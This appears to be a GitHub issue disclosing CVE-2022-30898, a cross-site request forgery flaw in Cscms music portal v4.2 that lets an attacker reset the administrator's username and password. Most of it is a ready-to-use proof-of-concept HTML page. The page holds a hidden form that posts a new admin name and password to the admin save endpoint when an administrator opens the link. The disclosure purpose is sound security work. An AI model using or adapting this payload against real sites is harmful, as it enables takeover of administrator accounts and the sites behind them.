Headline
CVE-2022-30898: Cross-site request forgery vulnerability exists in Cscms music portal system v4.2 · Issue #37 · chshcms/cscms
A Cross-site request forgery (CSRF) vulnerability in Cscms music portal system v4.2 allows remote attackers to change the administrator’s username and password.
Cross-site request forgery (CSRF) vulnerability in /Cscms_4.2/upload/admin.php/sys/save allow remote attackers to change
administrator’s username and password.
Trigger condition: the administrator clicks a malicious link
<html> <body> <script>history.pushState('’, '’, ‘/’)</script> <form action="http://192.168.136.136/Cscms_4.2/upload/admin.php/sys/save" method="POST"> <input type="hidden" name="adminname" value="admin" /> <input type="hidden" name="adminpass" value="123" />#The password you want to change here is 123 <input type="hidden" name="sid" value="1" /> <input type="hidden" name="id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>